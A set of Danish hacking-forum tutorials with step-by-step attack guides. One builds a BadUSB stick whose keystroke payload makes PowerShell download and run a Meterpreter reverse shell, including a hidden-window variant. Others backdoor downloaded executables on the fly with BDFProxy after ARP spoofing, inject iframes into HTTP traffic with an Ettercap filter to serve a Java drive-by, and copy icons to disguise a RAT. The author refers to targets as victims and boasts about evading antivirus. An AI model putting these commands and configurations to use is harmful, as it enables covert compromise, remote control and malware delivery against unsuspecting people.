- Vær opmærksom på, at min Meterpreter Payload ikke fylder meget, samt er hostet lokalt, så større eksterne filer kan tage længere tid om at blive downloadet ned på offerets PC.
- Du kan også vælge at gemme Powershell vinduet, men for bedre at demonstrere angrebet har jeg valgt ikke at gøre dette.
- Valgte at køre sidste Shell kommando for at vise, at vores Payload kører og er funktionel selv efter enheden er frokoblet (Giver sig selv)

- Har skrevet dette uden retstavning på en Linux maskine, så der er nok rigeligt med fejl at rette. Ting som store I'er og tastefejl.
- Det ser forfærdeligt rodet ud, så må lige få bikset en video sammen.
- Ville også gerne have haft billeder med af diverse kommandoers Output, men der er begrænsning på antal billeder pr. post, så det bliver lige kopieret output i stdet - på et tidspunkt.
- Undskylder på forhånd musikken i baggrunden. Ville have haft klippet alt lyden fra.
- Skriver også lidt langsomt efter der er forbindelse, men sad med en bærbar mere i skødet jeg ikke ville tabe, og mobilen i højre. Så der er lige et par sekunder der kunne have været undværet.
- Kvaliteten er heller ikke for god på en ældre HTC model så sent om aftenen, men har et bedre kamera til rådighed.
- Hov. Der var vidst også begrænsning af indlejrede vidoer.

Hvad er BadUSB - En beskrivelse af BadUSB
Krav - Krav til at få denne type angreb til at virke
Trin #1 - Installation af SDCC
Trin #2 - Server til hosting af Meterpreter Payload
Trin #3 - Kompilering af værtøjer
Trin #4 - Test af chip og firmware version
Trin #5 - Anskaffelse af Burner Image
Trin #6 - Backup af enhedens gamle firmware
Trin #7 - Compilering af den specialbyggede firmware
Trin #8 - Encoding af Rubber Ducky Payload
Trin #9 - Flashing og installering af ny firmware
Trin #10 - Opsætning af Meterpreter Payload
Hardware introduceret Boot Mode - Der kan opstå problemer med at flashe nyt firmware efter første fimware er installeret. Det kan ordnes ved at kortslutte stifterne på NAND-chippen
Advarsel - Enheden vil ikke fungere som traditionelt USB-stik mere

Hvad er BadUSB?
BadUSB er en fælles betegnelse for USB enheder, der er modificerede til at afvige fra deres normale egenskaber, og herved opføre sig som andre typer enheder, for eksempel netværkskort – eller i dette tilfælde et HID (Human Interface Device) Keyboard. Dette opnåes ved brug af skræddersyet firmware.

Her er den originale Talk af Karsten Nohl og Jakob Lell - fra Black Hat 2014

Citer:https://www.youtube.com/watch?v=nuruzFqMgIw

Desværre har disse herre valgt at holde deres modificerede firmware tæt på kroppen, og de har i skrivende stund endnu ikke offentliggjort denne.

Her har vi så en Talk fra DerbyCon 4, hvor Adam Caudill og Brandon Willson gennemgår Deres projekt omhandlende BadUSB:

Citer:https://www.youtube.com/watch?v=xcsxeJz3blI

Denne gang blev deres firmware delt offentligt på deres Github, til stor glæde for os andre ;)

Citer:https://github.com/adamcaudill/Psychson/

Krav
Windows Maskine – Til at køre deres firmware værktøjer.

Visual Studio/C++ - Til at kompilere disse med (Har kompileret og uploadet disse filer til:

Citer:http://s000.tinyupload.com/index.php?fil...2118188682

Small Device C Compiler -

Citer:http://sdcc.sourceforge.net/

Psychson Firmware + Værktøjer:

Citer:https://github.com/adamcaudill/Psychson/

- Git-clone eller download de samlede filer som et .zip arkiv

Et Burner Image:

Citer:http://www.usbdev.ru/files/phison/

- Dette er et krav for at gemme samt installere firmware.

Et USB stik med Phison 2251-03 (2303) Chipset – Dette er indtil videre den eneste understøttede chip.
Her har jeg valgt at benytte en SanDisk Ultra 16Gb USB 3.0 fra følgende shop:

Citer:http://www.bj-trading.dk/bjshop/default....&psn=68,64

(Understøttede enheder kan ses her:

Citer:https://github.com/adamcaudill/Psychson/...ed-Devices

-Vær dog opmærksom på, at der af en eller anden grund kan være forskellige chipsets i disse enheder, så bestil et par stykker)

En Rubber Ducky Payload – Dette er selve tastetrykkene, som firmwaren udfører når enheden er registreret
(Diverse Payloads kan findes i deres Wiki:

Citer:https://github.com/hak5darren/USB-Rubber...i/Payloads

-
Eller ved et kig på Hak5s forum:

Citer:https://forums.hak5.org/index.php?/forum...ber-ducky/

En RAT Payload – Dette kan være en hvilket som helst RAT eller eksekverbar fil til tests. I mit tilfælde vil jeg som altid bruge Meterpreter 

En webserver – Da vi bruger Wget i dette eksempel, skal vi også bruge en server til at hoste vores Meterpreter Payload.

Trin #1
Installér Small Device C Compiler (SDCC) til følgende mappe: C:\Program Files\SDCC
I mit tilfælde installerer jeg til drev C, men dette kan selvfølgelig forekomme anderledes hos andre installationer. Det er her en god ide at installere SDCC til samme drev/partition som indeholder jeres Windows installation.

Trin #2
Da jeg har valgt at køre en Payload der benytter Wget, skal jeg også have en server kørende, for at hoste vores Meterpreter Payload. Dette kan være en webhost, VPS, fildelingstjenester osv. Selv vil jeg til dette eksempel bruge en simpel lokal XAMPP opsætning, men Apache kan ligeledes bruges. XAMPP er installér-og-kør, så der er ingen grund til at gå i dybden med det.

Hvis du vælger at benytte dig af mine for-kompilerede filer, så kan du springe Trin #1 over.

Trin #3
Kompiler DriveCom, EmbedPayload og Injector ved at åbne deres tilhørende .sln filer en ad gangen i Visual Studio/C++ 2012 eller 2013. Tryk herefter på den øverste menulinie hvor der står ’build’ og tryk ’Build solution’. Dette kompilerer værktøjerne til Tools undermappen under Psychson hovedmappen.

Trin #4
Nu kan vi bruge værktøjet DriveCom til at sikre os, at vi også har det rigtige hardware i vores USB stik.
Åbn kommandovinduet/CMD i Tools undermappen under Psychson hovedmappen.
Herfra kan vi bruge følgende kommando, til at få informationerne fra vores USB enhed:

Citer:DriveCom.exe /drive=G /action=GetInfo

drive skal pege på bogstavet der repræsenterer vores USB enhed, I mit tilfælde er enheden monteret på G.
Vil benytte mig af G for resten af denne tekst, så vær opmærksom på dette hvis jeres drev har et anderledes mærkat.

Citer:C:\Users\Balder\Desktop\Psychson-master\tools>DriveCom.exe /drive=G /action=GetInfo
Action specified: GetInfo
Gathering information...
Reported chip type: 2303
Reported chip ID: D0-51-24-1B-00-00
Reported firmware version: 254.07.00
Mode: Unknown

Trin #5
Nu skal vi have fat I et Burner Image, så vi kan gemme den gamle firmware allerede installeret på vores enhed, samt installere/flashe vores nye firmware efter vi har modificeret den.
Gå ind på http://www.usbdev.ru/files/phison/ og søg (Ctrl + F i Chrome) efter ’Additional Files’.
Tredje resultat vil her give os en liste over arkiver med firmware filer, og da vi benytter os af PS2251-03 – også kaldet 2303, downloader vi følgende fil:

Citer:Firmware PS2251-03 [BN03*.BIN, FW03*.BIN] {BN – 7 files; FW – 12 files} ; firmware_ps2251-03.rar; size: 787 304 bytes

I firmware_ps2251-03.rar arkivet finder vi filen ’BN03V104M.BIN’. Dette er vores Burner Image.
BN – Dette går jeg ud fra er et prefix for Burner Image.
03 – Dette er vores controller version.
V104 – Dette er versionen på vores Burner Image.
M – Indikerer at vores Burner Image er tiltænkt 8K NAND chips. (ifølge deres Wiki benyttes dette af alle deres testede USB 3.0 enheder)

Lad os placere filen I vores ’Tools’ mappe, så vi ikke behøver at skrive fuld sti når vi skal arbejde med den.

Trin #6
Nu ville det være smart at gemme vores gamle firmware, både så vi har en backup til hvis det skulle gå galt, men også så vi har firmware der kan patches, hvis den generede firmware nu ikke virker.
I vores kommandovindue fra før, skriver vi følgende kommando:

Citer:DriveCom.exe /drive=G /action=SetBootMode

Citer:C:\Users\Balder\Desktop\Psychson-master\tools>DriveCom.exe /drive=G /action=SetBootMode
Action specified: SetBootMode

Nu er vores enhed sat i Boot Mode, og vi kan nu fortsætte med at sende vores Burner Image til enheden, ved hjælp af følgende kommando:

Citer:DriveCom.exe /drive=G /action=SendExecutable /burner=BN03V104M.BIN

Hvor burner er det Burner Image vi hentede før.

Citer:C:\Users\Balder\Desktop\Psychson-master\tools>DriveCom.exe /drive=G /action=SendExecutable /burner=BN03V104M.BIN
Action specified: SendExecutable

Nu er vores Burner Image så klar til at dumpe/gemme den gamle firmware fra enheden. Dette klares med følgende kommando:

Citer:DriveCom.exe /drive=G /action=DumpFirmware /firmware=GammelFirmware.BIN

Hvor firmware er navnet vi ønsker at gemme vores firmware som. I dette tilfælde kalder vi det bare ’GammelFirmware.BIN’.

Denne fil er nu gemt i vores ’Tools’ mappe.

Trin #7
Har her valgt at bruge den firmware de har skrevet til formålet, i stedet for at patche filen vi gemte i sidste trin.
I kommandovinduet hopper vi tilbage til Psychson mappen, og herefter ind i firmware mappen.
Dette kan gøres ved følgende kommando:

Citer:cd ../firmware

Nu kører vi så bare build.bat i samme kommandovindue, og ganske få sekunder efter, vil en række filer være tilgængelige i en ny ’bin’ mappe inde under ’firmware’ mappen.
Inde i ’bin’ mappen kopierer vi en af de nye filer – fw.bin ind i vores ’Tools’ mappe, så vi igen slipper for at angive sti, og holder det hele samlet.

Trin #8
Nu skal vi så have fat i en Rubber Ducky Payload. Disse kan findes i de to links jeg skrev oppe i ’krav’ afsnittet. Jeg vil i denne tekst benytte mig af følgende Payload, som åbner Powershell, WGET’er min RAT Payload, og eksekverer/kører denne. (Powershell virker fra Vista og op efter):
https://github.com/hak5darren/USB-Rubber...---execute

Citer:GUI r
DELAY 100
STRING powershell (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER

Der dog også findes i en lidt anderledes udgave, som gemmer Powershell vinduet, så det bliver lidt mere ’stealth’:

Citer:GUI r
DELAY 100
STRING powershell -windowstyle hidden (new-object System.Net.WebClient).DownloadFile('http://example.com/bob.old','%TEMP%\bob.exe'); Start-Process "%TEMP%\bob.exe"
ENTER

Da jeg benytter mig af en lokal server på netværket, ændrer jeg ovenstående URL i vores Ducky Script til dennes lokale IP -

Citer:http://192.168.0.106/bob.old

Dette script skal så encodes til binær form, så det kan sammenkædes med vores enheds firmware. Dette kan gøres online på http://www.ducktoolkit.com/Encoder.jsp - Her skal vores script bare kopieres ind og Keyboard Layout skiftes til Denmark. Så trykker vi på ’Generate Script’, og herefter ’Download .bin’. Dette downloader en fil ved navn ’inject.bin’, som indeholder vores encoded script.

Kopier eller flyt denne fil over i din tools mappe, så vi kan fortsætte med at sammenkæde den med vores firmware (fw.bin) fil.
I vores tidligere – eller i et nyt kommandovindue skal vi nu tilbage til vores 'tools' mappe. Dette kan lige som før gøres ved følgende kommando:

Citer:cd ../tools

- Eller ved at åbne et nyt kommandovindue ved at holde shift inde, højreklikke på mappen og vælge 'åbn kommandovindue her'.
Her vil vi bruge injector.exe til at injicere vores Ducky Payload (inject.bin) ind i vores firmware (fw.bin) fil.
Sørg for at begge filer er gemt i tools mappen, og kør følgende kommando:

Citer:injector.exe inject.bin fw.bin

For at sikre os, at vores firmware nu også er bevet injiceret, kan vi tjekke filens timestamp. Hvis denne stemmer over ens med systemets klokkeslæt, så ved vi at der er blevet arbejdet på filen.

Trin #9
Nu skulle alt være klart til at vi kan flashe den nye firmware til vores enhed.
Så længe vi ikke har haft frakoblet vores enhed fra USB porten, skulle vi nu kunne køre følgende kommando for at sende den nye firmware til enhden og installere den ved hjælp af vores tidligere Burner Image:

Citer:DriveCom.exe /drive=G /action=SendFirmware /burner=BN03V104M.BIN /firmware=fw.bin

burner er samme Burner Image som vi benyttede tidligere.
firmware er vores genererede og modificerede firmware.

(Hvis du har haft enheden [b]frakoblet eller noget andet er gået galt, så brug den tidligere kommando til at ændre enheden til Boot Mode igen)[/b]

Nu skulle vores nye firmware være installeret på enhden, og være klar til brug.

Næste trin går ud på at generere en Meterpreter Payload, så hvis du har en anden fil kan du springe dette over.

Trin #10

Bob.old er den fil vi ønsker at eksekvere på vores offers maskine.
Det kan være alle former for eksekverbare filer, såsom en DarkComet server eller bare Notepad hvis der skal testes.
Vil som så mange andre gange benytte mig af en Meterpreter Payload, for at gøre præsentationen lidt realistisk. Denne payload genererer jeg ved hjælp af Metasploit, som i dette tilfælde kører på Kali, men også findes til Windows. Med Kali kørende åbner jeg en ny konsol/terminal og indtaster følgende kommando og parametre:

Citer:msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.106 LPORT=9191 X > /root/Desktop/bob.old

Hvor msfpayload er modulet der genererer vores payload ud fra de givne parametre
LHOST er vores Lokale værtscomputer, og skal pege på maskinen der skal modtage forbindelsen fra offerets computer.
LPORT er porten værtscomputeren og offerets computer skal bruge til at oprette forbindelse og kommunikere.
windows/meterpreter/reverse_shell er payload typen. For at se de forskellige payloads kan vi skrive 'show payloads'. Meterpreter er ekstremt effektiv, og kan også genereres i en HTTPS version der krypterer kommunikationen ved hjælp af SSL.
X > bob.old specificerer placeringen samt filnavn på hvor vi vil gemme den genererede binære data til. Gemmer den bare på skrivbordet, og flytter den over til min maskine der kører XAMPP. Man kan også bare gemme filen til /var/www - og herefter køre etc/init.d/apache2 start' for at hoste filen på vores Kali maskine og efterfølgende starte Apache. Hvis man vælger at gøre dette, skal URL selvfølgelig pege på denne IP.

Her er et eksempel på hvordan det kan se ud. Dette passer dog ikke til ovenstående, da det er taget fra en af mine andre tåde:

Da jeg bruger Meterpreter skal jeg også opsætte en handler til at modtage indgående forbindelser. Her bruger jeg Metasploits handler, hvor LHOST peger på IP adressen som skal modtage offerets forbindelse, og LPORT, som er porten der skal sørge for de forbinder og kan kommunikere.

[size=x-largel]Nu har vi opsat vores Firmware, Ducky Payload, Meterpreter Payload (hosted på en lokal server) og vores handler. Hvis vi stikker enheden i USB-porten får vi et resultat i stil med første postede Youtube video

Hardware introduceret Boot Mode

Hvis vi nu ønsker at installere firmware IGEN, kan vi godt løbe ind i det problem, at vi ikke kan skifte enheden til BootMode ved hjælp af den tilhørende DriveCom software.
Hvis dette er tilfældet, kan vi være nødsaget til at starte enheden op i Boot Mode, ved at kortslutte specifikke stifter på chippen.
Dette billede bruger de selv i deres doc mappe på Github til at vise hvor disse stifter er tilstede på deres Patriot 8GB Supersonic Xpress enhed:

I mit tilfælde bruger jeg en SanDisk Ultra 16Gb USB 3.0, og der sidder stifterne således:

Alt man skal gøre er at bruge en metalgenstand såsom en nål eller kniv til at røre stifterne før og imens man tilslutter enheden. Dette kan godt være halv-svært at gøre uden et USB kabel, men det er stadig muligt.
Hold genstanden mod stifterne før enheden bliver sat i USB porten, og ca. et minuts tid efter den er registreret og LED lyset er blivende. Hvis LED lyset blinker, har du ikke kortsluttet stifterne korrekt.
Hvis lyset derimod bliver ved med at lyse, så skulle enheden igennem dens hardware være i Boot Mode igen, og trinnene kan gennemgåes igen. Da vi kan generere firmware og Ducky Payloads uden brug af enheden, er det sådan set kun ved firmware flashing/installation dette trin skal gennemgåes.

Desuden er det ikke alle enheder der er lige lette at åbne, og ved mine Sandisk Ultra blev jeg nødt til at skrælle dem godt og grundigt fra deres plastikhylstre:

Vær opmærksom på, at deres firmware ikke reagerer på Flash chippen, så med denne firmware virker enheden ikke som USB-stik / Oplagringsenhed mere.

Tak til Malcolm for lån af en af hans Youtube brugere. ;)

Sådan får du ikoner til din RAT

Sat, 11 Oct 2014 13:50:38 +0200

Hej alle sammen.
Jeg sad og legede med lidt RAT og krypteringen af den og ledte så efter et software til at skaffe ikonet af det ikon jeg skal binde min server til. Dette er til dem der vil have et præcist kopi af ikonet :)

Der kan selvfølgelig findes ikoner på nettet, men det er ikke alle man kan finde!

Start med at hente: ResourcesExtract v1.18
Download findes i bunden af siden til 32 eller 64 bit Windows.

Udpak filerne og kør programmet. Derefter lav en mappe til dine ikoner.

Derefter vælg det program hvor ikonet skal udpakkes fra og marker icons og tryk start.

Wohla! Nu har du ikonet til din RAT

PE-Patching over Netværket

Sun, 24 Aug 2014 23:59:45 +0200

Introduktion
I denne korte tutorial vil vi tage et kig på the BackDoor Factory, og dennes tilhørende BDFProxy, som er en modificeret version af MiTMProxy der kører i transparent mode. Det smarte ved BDF’s proxy er, at den kan injicere diverse former for kode direkte ind i et programs code caves ON-THE-FLY når de passerer vores proxy efter et Man-in-The-Middle angreb.
Dette betyder, at når en executable bliver downloaded over det usikre netværk vi har kontrol over, så bliver filen først hentet ned på vores server, BDF injicerer vores payload ind i executable filen og derefter leverer BDFProxy filen til vores offer.
BDF er ikke perfekt. Langt fra. Der er mange sikkerhedsforanstaltninger i forskellige typer software, såsom at tjekke filens MD5 hash, headers, tjekke ændret kode (f. eks. NSIS) osv.
Dette betyder, at utroligt mange filer vil blive beskadiget og ude af stand til at blive kørt. Har dog oplevet at en beskadiget fil stadig kører vores payload selvom hovedinstallationsprogrammet ikke virker.
Desuden kan vi ikke injicere filer der bliver hentet over HTTPS – kun hvis vi har serverens certifikat.

-Igen kan en video optages hvis der er brug for det. Men det er en enkel og hurtig process, så burde ikke behøves. ;)

Krav
Kali – eller hvilken som helst linux variant du foretrækker
Arpspoof
The BackDoor Factory + BDFProxy
Netcat – eller Metasploit’s handler
Lidt kendskab til Kali eller Linux generelt (cd, unzip osv. samt hvis du nu støder ind i problemer)

Trin 1
Der er diverse ’dependencies’ i BDF der kræver installation før dette framework overhovedet kan køres ordentligt. Det letteste er at installere Veil-Evasion, da dette vil tage hånd om alt det tunge arbejde.
https://github.com/Veil-Framework/Veil-Evasion/
Du kan bruge git clone, eller en hvilet som helst tredjeparts git-klient til at hente filerne ned og installere dem. Jeg trykker bare 'Download ZIP' i højre side på github, så jeg har filerne gemt til hvis jeg nu fucker up og bliver nødt til at gendanne enkelte filer.
ZIP-filen kan vi så udpakke ved at bruge unzip – Eller – bare dobbeltklikke og trække mappen ud i vores arbejdsmappe.
Veil-Evasion har et shell script der hedder 'setup.sh'. Dette script tager sig af installationen af alle de dependencies jeg nævne før. Hvis jeg husker rigtigt, snakker vi omkring 500MB, så det er lidt af en omgang.

Trin 2
Nu skal vi have hentet BDF og BDFProxy. Disse er på samme github account som før, da begge disse er fra manden bag Veil.
https://github.com/secretsquirrel/the-backdoor-factory
https://github.com/secretsquirrel/BDFProxy
Vil ikke gå i dybden med installationen. Da det er samme fremgangsmåde som før:
Det eneste der er værd at nævne her er, at the BackDoor Factory filerne skal placeres i en mappe kaldet ’bdf’ under samme mappe som du udpakkede BDFProxy filerne. Inde i BDFProxy mappen er der en shell-fil kaldet update.sh, den kan du bruge til at opdatere senere hen, ved samme fremgangsmåde som da vi installerede Veil-Evasion.

Trin 3
Vi bruger ifconfig igen, til at finde ud af hvilken lokal IP-adresse routeren har givet os (Denne skal bruges i trin 4):

Trin 4
I BDFProxy mappen[b] finder vi [b]'bdfproxy.cfg'. Denne konfigurationsfil skal vi bruge til at opsætte vores payloads, så de peger på vores egen IP (Eller IP’en der har vores listener kørende)
Åbn denne fil med et hvilket som helst redigeringsprogram til tekstfiler – getid, leafpad osv.
Fra linie 100 og ned finder vi en række instillinger der ser således ud:

Citer:[[[WindowsIntelx64]]]
PATCH_TYPE = APPEND #JUMP/SINGLE/APPEND
HOST = 192.168.1.16
PORT = 8088
SHELL = reverse_shell_tcp
SUPPLIED_SHELLCODE = None
ZERO_CERT = True
PATCH_DLL = False
MSFPAYLOAD = windows/x64/shell_reverse_tcp

[[[Styresystem og arkitektur]]]
PATCH_TYPE – Hvordan selve injicering skal foretages - Om koden skal indsættes i enkelte code caves, eller om den må splittes imellem flere.
HOST – Det er denne indstilling vi skal have til at pege på IP-adressen vi skal bruge til indgående forbindelser.
PORT – Porten vores payload vil bruge til at forbinde til vores IP.
SHELL – Dette er BDF’s egen syntaks, og angiver vores instillinger.
SUPPLIED_SHELLCODE – Hvis vi har vores egen shell code der skal ’suppleres’ til vores payload. Det er altså ikke en indstilling til udelukkende at bruge egen shell code. Den egenskab finder vi i ’User supplied shellcode’.
ZERO_CERT – Fjerner cerifikatet fra ’underskrevne’ programmer.
PATCH_DLL – Hvorvidt DLL’s skal injiceres.
MSFPAYLOAD – Hvilken payload der skal bruges til dette styresystem og arkitektur.

Det eneste vi faktisk behøver at ændre, er HOST parametren. Sørg for at PORT parametrene ikke overlapper hinanden. Ellers kan vi lege lidt med payloads og Patch_Types. Ret HOST til egen IP alle 4 steder, og gem filen når du er færdig.

Trin 5
Lige som min sidste tutorial, skal vi have aktiveret IP Forwarding

Citer:echo 1 > /proc/sys/net/ipv4/ip_forward

Igen sikrer vi os lige at ændringen nu også er godkendt. (OBS: Nogle gange er der andre processer der de-aktiverer IP Forwarding, så det er en god idé at cat’e filen hvis dit ARP spoof angreb ikke virker)

Citer:cat /proc/sys/net/ipv4/ip_forward

Trin 6
Nu kan vi så køre BDFProxy. I BDFProxy mappen finder vi et Python script der hedder 'bdf_proxy.py', og dette kan vi så køre fra mappen ved at bruge:

Citer:./bdf_proxy.py

eller:

Citer:python /root/Desktop/bdf/proxy/bdf_proxy.py

/root/Desktop/bdf/proxy/ - Stien til hvor du udpakkede BDFProxy

Trin 7
Nu skal vi så have startet vores ARP spoof angreb. Her behøves Ettercap ikke, da BDFProxy selv udfører alt arbejdet. I stedet kører vi arpspoof:

Citer:arpspoof –i wlan0 –t 192.168.0.102 192.168.0.1

-i wlan0 - Det interface vores netværkskort er registreret på. Kan findes ved at bruge 'ifconfig'.
-t 192.168.0.102 - Da dette er en demonstration bruger jeg kun en enkelt IP der skal arp spoofes, uden –t valgmuligheden vil alle IP’er på netværket få tildelt vores ARP pakker.
192.168.0.1 – Den vært hvis pakker vi vil opsnappe. Her er det vores router, da den står for pakkeomdelingen.

Trin 8
Nu starter vi vores listener, så alle indgående forbindelser bliver accepteret af vores computer. Igen vil jeg bruge Netcat, og igen kan andre listeners/handlers bruges.
[/i](Jeg ved mit ofres computer er Windows x64, så jeg ’lytter’ på den port der passer hertil fra bdfproxy.cfg. Hvis dette angreb var tiltænkt hele netværket, ville jeg selvfølgelig ’lytte’ på alle de gældende porte)[/i]

Trin 9
Når vores offer downloader en executable, vil denne blive injiceret med vores shell code, og derfter leveret til offeret ved hjælp af BDFProxy.
Vil i dette eksempel downloade Winrar x64 over netværket på ’offerets’ computer.
Når BDFProxy opdager en fil der er ved at blive downloadet, vil det se således ud:

Og når vores kære offer så åbner filen, vil vores payload blive eksekveret samtidig med installationsfilen.

Offerets PC – Winrar installationsfil:

Netcat – Shell på offeret PC:

BONUS
Vil fraråde Alle at skanne igennem Virustotal - I ved jo hvorfor - Men ville lige vise jer, hvad Reverse_TCP + Winrar gør for detections:

https://www.virustotal.com/en/file/ef648...408917202/

Citer:SHA256: ef6484a77db0dc031101509d8a08aa35176c91b4076a4818df631e5025d00853
File name: winrar-x64-511b1.exe
Detection ratio: 2 / 54
Analysis date: 2014-08-24 21:53:22 UTC ( 1 minute ago )

Det er pænt lækkert, hva?

Dette kan også opnåes ved hjælp af BDF - Backdoor.py.

HTML Injektion over Netværket

Sun, 24 Aug 2014 20:32:56 +0200

Introduktion
I denne tutorial vil vi tage et kig på en af de mange ting vi kan opnå på et netværk ved hjælp af Ettercap. De fleste har nok prøvet at sniffe HTTP brugernavne og kodeord, og sikkert også leget med SSLStrip dengang det rent faktisk var brugbart. Så lad os grave lidt dybere denne gang, og se hvad vi kan få ud af at lege lidt med filtre i Ettercap. For at sige det simpelt, vil vi omdirigere netværktrafikken til vores egen PC, udskifte diverse HTML tags med iFrames, køre en server der kan hoste vores drive-by, generere en payload med msfpayload, lade vores drive-by levere vores payload. Bemærk at vi udelukkende kommer til at ændre i HTTP trafik. Synes ikke det er besværet værd at skulle til at implementere hverken SSLStrip eller BREACH. Det skader mere end det gavner.

- Er ikke så kreativ når det kommer til tekst-baserede tutorials, men har kigget lidt her så ShellSec for at få en idé om hvordan i andre gør.
- Synes disse enkle trin var alt for nemme til at en video var nødvendig - det tager trods alt kun få minutter. MEN - kan være der kommer en senere.
- Overvejede at lave flere undersektioner med opsætning af Metasploit, BeEF og Javascript Keylogger + Form Grabber. Men det er jo noget af det letteste - kender og ikke rigtig folk og deres niveau endnu.
- Vær opmærksom på, at jeg kører som root. Hvis du bare er normal bruger, kan du blive nødt til at køre SU - eller SUDO hvis du er i sudoers-filen.
- Så skulle det vidst passe med 10 billeder.

Krav
Kali – eller hvilken som helst linux variant du foretrækker | Auditor? :P
Ettercap ~ Etterfilter
Apache server – Behøves heller ikke – mere om det senere
Metasploit ~ MSFPayload
Netcat – eller Metasploit’s handler
Lidt kendskab til Kali eller Linux generelt (Hvis du nu støder ind i problemer)

Trin 1
Til at starte med vil vi generere en reverse_tcp payload, da calc.exe måske er bedre til en demonstation, er det stadig lidt fesent.
Til det bruger vi selvfølgelig MSFPayload (Ingen grund til at gøre det mere kompliceret ved selv at kompilere skidtet).
Jeg er også stor fan af meterpreter payloads. Hvis man så SENERE vil have lidt bredere funktionalitet igennem en rat, kan man jo enten selv skrive plugins til meterpreter eller bare køre ratten direkte på vores offers PC.

Trin 2
Når vi har genereret vores payload, eller opsat en anden RAT alt efter hvad vi foretrækker, er det tid til at aktivere IP Forwarding, så vi kan få pakkerne omdirigeret:

Kode:
echo 1 > /proc/sys/net/ipv4/ip_forward

Det er her en god idé at tjekke om vores ændring nu også er vedtaget. Til det bruger vi selvfølgelig cat, så vi læse filens beskedne indhold direkte i terminalen

Kode:
cat /proc/sys/net/ipv4/ip_forward

Trin 3
For at ettercap kan være i stand til at udskifte HTML i den trafik der kører igennem vores PC, vil vi bruge et filter. Dette filter vil udskifte de HTML tags som vi specificerer. Filetret vil desuden sørge for ikke at ændre i data fra vores egen IP.

Citer:if (ip.proto == TCP && ip.dst != "VORES.IP") {
if (search(DATA.data, "gzip")) {
replace("gzip", " ");
msg("[*] Zapped 'gzip'\n");
}
if (search(DATA.data, "deflate")) {
replace("deflate", " ");
msg("[*] Zapped 'deflate'\n");
}
if (search(DATA.data, "gzip,deflate")) {
replace("gzip,deflate", " ");
msg("[*] Zapped 'gzip,deflate'\n");
}
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
msg("[*] Zapped 'Accept-Encoding'\n");
}

if (search(DATA.data, "")){
replace("","");
msg("[>] Injecting into ()\n");
}
if (search(DATA.data, "")){
replace("","");
msg("[>] Injecting into ()\n");
}
if (search(DATA.data, "body>")){
replace("body>","body>");
msg("[>] Injecting into (body>)\n");
}
if (search(DATA.data, "BODY>")){
replace("BODY>","BODY>");
msg("[>] Injecting into (BODY>)\n");
}

if (search(DATA.data, "http://VORES.IP")){
msg("[+] Injected correctly!\n");
}
}

Her ville det være en god idé at lave flere varianter af filteret. Alle de beskeder vi får fra ettercap kan godt blive uoverskueligt, så lav lidt filtre der Kun udskifter f. eks. Title eller Body tags. Desuden kan du fjerne flere af ’msg’ funktionerne, da vi kun er interesserede i, om vores filter nu også virker efter hensigten.

På øverste OG fjerde-nederste linie står der skrevet ‘VORES.IP’. Dette skal være vores egen IP, og Ettercap bruger denne til at tjekke for fuldendt injicering.
Routeren har givet os en lokal IP, så den kan finde og udlevere data til og fra os. Det er denne IP, vi skal bruge øverst. For at finde from til denne, kan vi bruge ifconfig (Hvor vi fra Windows kender ipconfig)

(Bemærk at jeg bruger wlan0 da jeg ved dette er interfacet mit trådløse netværkskort er registreret på. Hvad vi skal bruge her er vores inet adresse. Den eneste grund til jeg bruger grep, er for at mindske resultatet og gøre det lidt mere overskueligt)

Desuden ser vi 4 andre steder i filteret hvor der står 'SERVER.IP'. Disse er placeret inde i iFrame tags, og skal pege på den IP eller DOMÆNE hvor vi kører vores ’ondsindet’ kode. Dette kan være alt lige fra Javascript keylogger/form grabber, IP logger, BeEF, Metasploit autopwn. Man kan jo også lave sit eget lille exploit kit med nogle af følgende: Internet Explorer exploit, Java exploit med Java applet drive-by som fallback, Adobe Flash exploit med falsk opdatering som fallback, AddJavascriptInterface exploit til Android + APK download som fallback osv.

Trin 4
I dette eksempel vil jeg nøjes med følgende java drive-by:
https://mega.co.nz/#F!P49QHbKa!BvW2MEo_mIhpPTeKoy3kDw
Det er et meget simpelt drive-by der kun kræver disse 3 filer:
Index.html
drive.jar
pload.exe (Den fil vi ønsker at køre på vores ”ofres” computere)
Nu gældet det så bare om at kopiere filerne til den mappe vi kører vores server fra.
Index.html ser således ud:

Citer:

Parametrene er opsat på denne måde:
archive skal pege på vores kompilerede .jar java fil.
filename angiver hvad filen skal hedde efter den er hentet ned på ofrets computer.
urserver peger på serveren og filnavnet på den fil vi vil lade vores drive-by applet køre. I dette tilfælde er det vores reverse_tcp payload.

Har bare valgt at bruge Apache og den tilhørende mappe /var/www
Bare træk filerne over i mappen eller brug cp hvis du vil være awesome.

Nu kan vi så starte Apache. Det kan du gøre fra 'Applications' menuen, køre 'apache2ctl' eller bare bruge 'init.d' som i dette eksempel - Det er igen en smagssag.

Trin 5
Når din server kører og er klar til at levere vores exploit kan vi gå videre til at kompilere vores Ettercap filter. Desværre er Ettercap ikke lavet sådan at vi kan scripte uden at kompilere, men heldigvis tager det ikke mere end 5 sekunder.

Vi vil her bruge Etterfilter. Etterfilter er en del af Ettercap, og kræver at vi specificerer en input-fil[u] (filteret der skal kompileres) og en [u]output-fil (filteret Efter kompilering). I dette eksempel er mit filter placeret i /root/ mappen - samme mappe som konsollen arbejder i uden at du selv har angivet andet. Så hvis dit filter er gemt i en anden mappe, eller hvis du har ændret konsollens arbejdsmappe til noget andet, så sørg for at tilføje filstien når du kører etterfilter. Du kan faktisk bare trække filen ind i konsollen, og så får du den fulde sti.

Trin 6
Nu kan vi så køre Ettercap med følgende parametre:
-T – Det ville ikke give mening at køre GUI mode her, så vi kører i text mode i konsollen
–i - Samme interface som vi fandt tidligere – altså vores netværkskort)
–q - Så vi ikke bliver overvældet af pakkedata, men kun får brugbare informationer såsom forbundne enheder og filter data
–F - Filteret vi kompilerede før
–M - Man-in-The-Middle angreb. Desuden burger vi ARP til at specificere at vores angreb skal forgifte vores ofres ARP-caches, så deres pakker bliver sendt videre til Vores PC hvor vi kan ændre dem on-the-fly
// // - Her vælger vi targets. I dette eksempel er ALLE IP’er targets, men du kan også vælge en enkelt IP (192.168.0.105) eller en række (192.168.0.105-110) som ’Target 1’ efterfulgt af routerens IP som ’Target 2’ (192.168.0.1)
